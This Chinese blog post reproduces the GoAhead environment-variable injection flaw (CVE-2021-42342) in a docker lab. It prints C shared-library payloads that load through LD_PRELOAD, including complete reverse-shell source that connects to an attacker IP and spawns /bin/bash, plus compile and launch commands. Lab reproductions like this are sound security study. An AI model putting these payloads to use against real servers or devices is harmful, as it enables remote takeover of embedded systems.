GoAhead Server 环境变量注入(CVE-2021-42342)

GoAhead是一个开源(商业许可)、简单、轻巧、功能强大、可以在多个平台运行的Web Server,多用于嵌入式系统、智能设备。其支持运行ASP、Javascript和标准的CGI程序。

这个漏洞是CVE-2017-17562漏洞补丁的绕过,攻击者可以利用该补丁没有考虑到的multipart表单控制目标服务器的环境变量,进而劫持LD_PRELOAD来执行任意代码。

参考链接:

漏洞环境

执行如下命令启动GoAhead 5.1.4:

docker-compose up -d

启动完成后,访问http://your-ip:8080/即可看到欢迎页面。访问http://your-ip:8080/cgi-bin/index即可查看到Hello页面,即为CGI执行的结果。

漏洞复现

(1)打印测试内容

编写打印测试文件的poc代码如下(poc.c):

#include <unistd.h>

static void before_main(void) __attribute__((constructor));

static void before_main(void)
{
    write(1, "Hello: World\r\n\r\n", 16);
    write(1, "Hacked\n", 7);
}

这样,before_main函数将在程序执行前被调用。编译以上代码:

gcc -s -shared -fPIC ./poc.c -o payload.so

然后,我们使用这个脚本来发送恶意数据包,复现漏洞:

python3 poc.py http://target-ip:8080/cgi-bin/index payload.so

可见,我们在动态链接库中编写的劫持代码已经被成功执行:

(2)反弹Shell

反弹shell的poc代码如下(shell.c):

#include<stdio.h>
#include<stdlib.h>
#include<sys/socket.h>
#include<netinet/in.h>

char *server_ip="192.168.75.150";
uint32_t server_port=9999;

static void reverse_shell(void) __attribute__((constructor));
static void reverse_shell(void) 
{
  int sock = socket(AF_INET, SOCK_STREAM, 0);
  struct sockaddr_in attacker_addr = {0};
  attacker_addr.sin_family = AF_INET;
  attacker_addr.sin_port = htons(server_port);
  attacker_addr.sin_addr.s_addr = inet_addr(server_ip);
  if(connect(sock, (struct sockaddr *)&attacker_addr,sizeof(attacker_addr))!=0)
    exit(0);
  dup2(sock, 0);
  dup2(sock, 1);
  dup2(sock, 2);
  execve("/bin/bash", 0, 0);
}

使用如下命令编译以上代码:

gcc -s -shared -fPIC ./shell.c -o shell.so

在对应的ip端口上开启监听

执行payload,此时脚本可能会报错,但没有影响

python3 poc.py http://target-ip:8080/cgi-bin/index shell.so

成功触发RCE:

posted @ 2022-05-16 07:47  NoCirc1e  阅读(465)  评论(0编辑  收藏  举报